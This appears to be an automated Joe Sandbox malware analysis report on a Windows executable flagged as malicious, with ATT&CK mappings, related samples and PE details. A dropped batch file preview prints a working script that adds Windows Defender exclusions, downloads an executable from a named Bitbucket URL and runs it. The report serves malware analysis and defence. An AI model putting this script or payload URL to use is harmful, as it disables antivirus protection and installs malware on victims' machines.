Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	11 Scripting	Valid Accounts	1 Native API	11 Scripting	11 Process Injection	1 Disable or Modify Tools	OS Credential Dumping	11 Security Software Discovery	Remote Services	1 Archive Collected Data	11 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	1 PowerShell	1 DLL Side-Loading	1 DLL Side-Loading	21 Virtualization/Sandbox Evasion	LSASS Memory	1 Process Discovery	Remote Desktop Protocol	Data from Removable Media	1 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	11 Process Injection	Security Account Manager	21 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	Data from Network Shared Drive	2 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	1 Obfuscated Files or Information	NTDS	1 Application Window Discovery	Distributed Component Object Model	Input Capture	3 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 DLL Side-Loading	LSA Secrets	2 File and Directory Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	Steganography	Cached Domain Credentials	11 System Information Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Link
Gq48hjKhZf.exe	56%	Virustotal	Browse
Gq48hjKhZf.exe	39%	ReversingLabs
Gq48hjKhZf.exe	100%	Joe Sandbox ML

Name	IP	Active	Malicious	Antivirus Detection	Reputation
bitbucket.org	185.166.143.48	true	false		high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://bitbucket.org/mynewworkspace123312/scnd/downloads/AHPOBS.exe	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
185.166.143.48	bitbucket.org	Germany		16509	AMAZON-02US	false

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1580296
Start date and time:	2024-12-24 08:56:02 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 4m 38s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	12
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	Gq48hjKhZf.exe renamed because original name is a hash value
Original Sample Name:	454bf064c19d363b154a419fc69dc693.exe
Detection:	MAL
Classification:	mal88.evad.winEXE@12/12@1/1
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 100% Number of executed functions: 24 Number of non-executed functions: 38
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, WmiPrvSE.exe
Excluded IPs from analysis (whitelisted): 4.245.163.56, 13.107.246.63
Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtCreateKey calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
02:56:54	API Interceptor	67x Sleep call for process: powershell.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
185.166.143.48	http://bitbucket.org/aaa14/aaaa/downloads/dFkbkhk.txt	Get hash	malicious	Unknown	Browse	bitbucket.org/aaa14/aaaa/downloads/dFkbkhk.txt

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
bitbucket.org	2oM46LNCOo.exe	Get hash	malicious	LummaC	Browse	185.166.143.50
	tTGxYWtjG5.exe	Get hash	malicious	LummaC	Browse	185.166.143.48
	iaLId0uLUw.exe	Get hash	malicious	LummaC	Browse	185.166.143.50
	yuij5p5p3W.exe	Get hash	malicious	LummaC	Browse	185.166.143.50
	NAnOVCOt4L.exe	Get hash	malicious	LummaC	Browse	185.166.143.50
	fkawMJ7FH8.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, RedLine, Stealc	Browse	185.166.143.48
	OtHVIQ2ge4.exe	Get hash	malicious	LummaC	Browse	185.166.143.49
	fr2Mul3G6m.exe	Get hash	malicious	LummaC	Browse	185.166.143.49
	payment_3493.pdf	Get hash	malicious	Unknown	Browse	185.166.143.48
	FBmz85HS0d.exe	Get hash	malicious	LummaC	Browse	185.166.143.50

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
AMAZON-02US	2oM46LNCOo.exe	Get hash	malicious	LummaC	Browse	185.166.143.50
	tTGxYWtjG5.exe	Get hash	malicious	LummaC	Browse	185.166.143.48
	iaLId0uLUw.exe	Get hash	malicious	LummaC	Browse	185.166.143.50
	yuij5p5p3W.exe	Get hash	malicious	LummaC	Browse	185.166.143.50
	sh4.nn.elf	Get hash	malicious	Okiru	Browse	54.171.230.55
	mipsel.nn.elf	Get hash	malicious	Okiru	Browse	54.171.230.55
	armv5l.elf	Get hash	malicious	Unknown	Browse	35.163.11.216
	splm68k.elf	Get hash	malicious	Unknown	Browse	3.138.165.134
	nklarm7.elf	Get hash	malicious	Unknown	Browse	3.115.112.216
	splarm7.elf	Get hash	malicious	Unknown	Browse	3.116.167.193

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
3b5074b1b5d032e5620f69f9f700ff0e	singl6.mp4.hta	Get hash	malicious	LummaC	Browse	185.166.143.48
	hnskdfgjgar22.bat	Get hash	malicious	Abobus Obfuscator, Braodo	Browse	185.166.143.48
	Proforma Invoice.exe	Get hash	malicious	MassLogger RAT	Browse	185.166.143.48
	Azygoses125.exe	Get hash	malicious	GuLoader, Snake Keylogger, VIP Keylogger	Browse	185.166.143.48
	WO.exe	Get hash	malicious	Metasploit	Browse	185.166.143.48
	ChoForgot.exe	Get hash	malicious	Vidar	Browse	185.166.143.48
	payment_3493.pdf	Get hash	malicious	Unknown	Browse	185.166.143.48
	1lhZVZx5nD.exe	Get hash	malicious	Stealc, Vidar	Browse	185.166.143.48
	Archivo-PxFkiLTWYG-23122024095010.hta	Get hash	malicious	Unknown	Browse	185.166.143.48
	acronis recovery expert deluxe 1.0.0.132.rarl.exe	Get hash	malicious	LummaC	Browse	185.166.143.48

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	64
Entropy (8bit):	0.34726597513537405
Encrypted:	false
SSDEEP:	3:Nlll:Nll
MD5:	446DD1CF97EABA21CF14D03AEBC79F27
SHA1:	36E4CC7367E0C7B40F4A8ACE272941EA46373799
SHA-256:	A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
SHA-512:	A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
Malicious:	false
Reputation:	high, very likely benign file
Preview:	@...e...........................................................

C:\Users\user\AppData\Local\Temp\9A83.tmp\9A84.tmp\9A85.bat

Download File

Process:	C:\Users\user\Desktop\Gq48hjKhZf.exe
File Type:	ASCII text, with CRLF, LF line terminators
Category:	dropped
Size (bytes):	347
Entropy (8bit):	5.290067082162046
Encrypted:	false
SSDEEP:	6:NS0o++AI4eGgdEYzPs++AIIzVr+fxiA8q2pPKB++AI4eGgdEEFACp+tXzp3:NS9EsuUUEVr+ZiRsBEsuEJUtjN
MD5:	16E1A923C995AA08BDF178EF8DEE95D4
SHA1:	271758F6726EA175CC31F4845810E348B8CA75DB
SHA-256:	E54DCAAC4D1D94F6596EC6BB97D9D86E48C8C55C4F4130651D78CFEF49262C54
SHA-512:	62A8A2EFB82D78780417E3693B89EFC4C05592DF28C4490FD1B6A1B81E2D0FF50A07809CE2BCF06B0755BA79C1CC903B3EBD456B87385D0614AE545C8C0F8434
Malicious:	true
Yara Hits:	Rule: JoeSecurity_PowershellDownloadAndExecute, Description: Yara detected Powershell download and execute, Source: C:\Users\user\AppData\Local\Temp\9A83.tmp\9A84.tmp\9A85.bat, Author: Joe Security
Reputation:	low
Preview:	@shift /0..@echo off.powershell /nop /com "Add-MpPreference -ExclusionPath %TEMP%".powershell /nop /com "(New-Object Net.WebClient).DownloadFile('https://bitbucket.org/mynewworkspace123312/scnd/downloads/AHPOBS.exe', '%TEMP%\AHPOBS.exe')";.powershell /nop /com "Add-MpPreference -ExclusionProcess %TEMP%\AHPOBS.exe".cmd.exe /c %TEMP%\AHPOBS.exe;..

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1d3topcf.dot.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1xlzrs3t.kph.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3dqonm5q.u3s.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_everk50l.cjd.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_i0j4otej.zrm.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_i0wyqqse.3jb.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jxdz12a2.pmx.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_uzhxfklq.sjp.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_vivi00ow.cl5.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xfzeaxoa.wly.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

Static File Info

General

File type:	PE32+ executable (GUI) x86-64, for MS Windows
Entropy (8bit):	6.461642473177525
TrID:	Win64 Executable GUI (202006/5) 92.64% Win64 Executable (generic) (12005/4) 5.51% Generic Win/DOS Executable (2004/3) 0.92% DOS Executable Generic (2002/1) 0.92% VXD Driver (31/22) 0.01%
File name:	Gq48hjKhZf.exe
File size:	123'392 bytes
MD5:	454bf064c19d363b154a419fc69dc693
SHA1:	98beb972b52d32c846e9e485cbf17e9211cbe5ab
SHA256:	6a46b3762d71b47d0c728e967ee9129f523689ff70196a953baa3f60c85a26b5
SHA512:	4c87c628a5b8123faf35c9ef072e91463024f3429ee00998753bca58c77d34f31fd4b55afca7e4a4f25dff837e6db72df59f13f27430b1c16c0c13845b4e6df7
SSDEEP:	3072:kV3J6kkt5h1X+HqTi0BW69hd1MMdxPe9N9uA0/+hL9TBfnP8B:Jt5hBPi0BW69hd1MMdxPe9N9uA069TBc
TLSH:	24C3276AB2E01198EBF581F6D5920746EB7074321715A3DB5B7863B31B2B8C58F3D3A0
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d...E.@]........../....2.b...\|.................@.............................0.............................................

File Icon


Icon Hash:	90cececece8e8eb0

Static PE Info

General

Entrypoint:	0x140001000
Entrypoint Section:	.code
Digitally signed:	false
Imagebase:	0x140000000
Subsystem:	windows gui
Image File Characteristics:	RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, LARGE_ADDRESS_AWARE
DLL Characteristics:
Time Stamp:	0x5D400545 [Tue Jul 30 08:52:21 2019 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	7182b1ea6f92adbf459a2c65d8d4dd9e

Entrypoint Preview

Instruction
dec eax
sub esp, 28h
dec ecx
mov eax, 00000160h
dec eax
xor edx, edx
dec eax
mov ecx, 40020444h
add dword ptr [eax], eax
add byte ptr [eax], al
call 00007FA7DCEC9448h
dec eax
xor ecx, ecx
call 00007FA7DCEC9446h
dec eax
mov dword ptr [0001F420h], eax
dec ebp
xor eax, eax
dec eax
mov edx, 00001000h
dec eax
xor ecx, ecx
call 00007FA7DCEC9433h
dec eax
mov dword ptr [0001F3FFh], eax
dec eax
mov eax, 4001F090h
add dword ptr [eax], eax
add byte ptr [eax], al
dec eax
mov dword ptr [0001F43Eh], eax
call 00007FA7DCED446Ah
call 00007FA7DCED40F9h
call 00007FA7DCED0220h
call 00007FA7DCECF813h
call 00007FA7DCECF0A2h
call 00007FA7DCECED71h
call 00007FA7DCECE468h
call 00007FA7DCECD91Fh
call 00007FA7DCEC9542h
call 00007FA7DCED2405h
call 00007FA7DCED0C64h
dec eax
mov edx, 4001F032h
add dword ptr [eax], eax
add byte ptr [eax], al
dec eax
lea ecx, dword ptr [0001F3C6h]
call 00007FA7DCED4492h
dec eax
mov ecx, FFFFFFF5h

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x1f198	0xc8	.data
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x22000	0x630	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x1d000	0x10d4	.pdata
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x1f6a8	0x448	.data
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.code	0x1000	0x5a99	0x5c00	bf90681e6a2fc3ae2cafaa536804f308	False	0.3649796195652174	data	5.470810722545147	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.text	0x7000	0x105b5	0x10600	8a1a401c4bd106ea802d83f827d2ddd2	False	0.4909798425572519	data	6.359859898514709	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x18000	0x4b3d	0x4c00	546e073a6443174d5e09f21ab6d487ce	False	0.6635999177631579	VAX-order 68k Blit mpx/mux executable	6.6666895682624485	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.pdata	0x1d000	0x10d4	0x1200	e81bd35fde0f70c926459e823327da76	False	0.4683159722222222	data	4.881026996790752	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x1f000	0x2318	0x1600	607c61f631092ad3ff4000c586299685	False	0.32848011363636365	data	4.298511113489139	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x22000	0x630	0x800	fc2c7c1a0f7df25abface4beeca1c3d9	False	0.53125	data	5.902828763075756	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	ZLIB Complexity
RT_RCDATA	0x2221c	0x1	very short file (no magic)	9.0
RT_RCDATA	0x22220	0xe	zlib compressed data	1.5714285714285714
RT_RCDATA	0x22230	0xc	data	1.6666666666666667
RT_RCDATA	0x2223c	0x151	data	1.032640949554896
RT_MANIFEST	0x22390	0x2a0	XML 1.0 document, ASCII text, with very long lines (672), with no line terminators	0.5520833333333334

Imports

DLL	Import
msvcrt.dll	memset, wcsncmp, memmove, wcsncpy, wcsstr, _wcsnicmp, _wcsdup, free, _wcsicmp, wcslen, wcscpy, wcscmp, memcpy, tolower, wcscat, malloc
KERNEL32.dll	GetModuleHandleW, HeapCreate, GetStdHandle, HeapDestroy, ExitProcess, WriteFile, GetTempFileNameW, LoadLibraryExW, EnumResourceTypesW, FreeLibrary, RemoveDirectoryW, GetExitCodeProcess, EnumResourceNamesW, GetCommandLineW, LoadResource, SizeofResource, FreeResource, FindResourceW, GetShortPathNameW, GetSystemDirectoryW, EnterCriticalSection, CloseHandle, LeaveCriticalSection, InitializeCriticalSection, WaitForSingleObject, TerminateThread, CreateThread, Sleep, WideCharToMultiByte, HeapAlloc, HeapFree, LoadLibraryW, GetProcAddress, GetCurrentProcessId, GetCurrentThreadId, GetModuleFileNameW, GetEnvironmentVariableW, SetEnvironmentVariableW, GetCurrentProcess, TerminateProcess, RtlLookupFunctionEntry, RtlVirtualUnwind, RemoveVectoredExceptionHandler, AddVectoredExceptionHandler, HeapSize, MultiByteToWideChar, CreateDirectoryW, SetFileAttributesW, GetTempPathW, DeleteFileW, GetCurrentDirectoryW, SetCurrentDirectoryW, CreateFileW, SetFilePointer, TlsFree, TlsGetValue, TlsSetValue, TlsAlloc, HeapReAlloc, DeleteCriticalSection, GetLastError, SetLastError, UnregisterWait, GetCurrentThread, DuplicateHandle, RegisterWaitForSingleObject
SHELL32.DLL	ShellExecuteExW, SHGetFolderLocation, SHGetPathFromIDListW
